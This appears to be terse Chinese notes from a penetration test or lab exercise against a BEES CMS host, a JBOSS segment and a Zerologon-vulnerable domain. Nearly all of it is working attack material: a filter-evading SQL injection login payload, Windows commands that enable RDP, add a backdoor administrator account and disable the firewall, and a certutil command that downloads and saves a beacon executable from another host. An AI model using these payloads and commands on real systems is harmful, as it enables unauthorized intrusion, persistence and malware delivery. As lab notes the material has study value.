BEES CMS #
fscan扫描到6582端口
user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0
在后台进行上传文件
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
JBOSS #
还存在一个192.168.20.10段
certutil -urlcache -split -f http://192.168.20.10:6582/beacon_x64.exe beacon.exe
Zerologon #
还是检查到了zerologon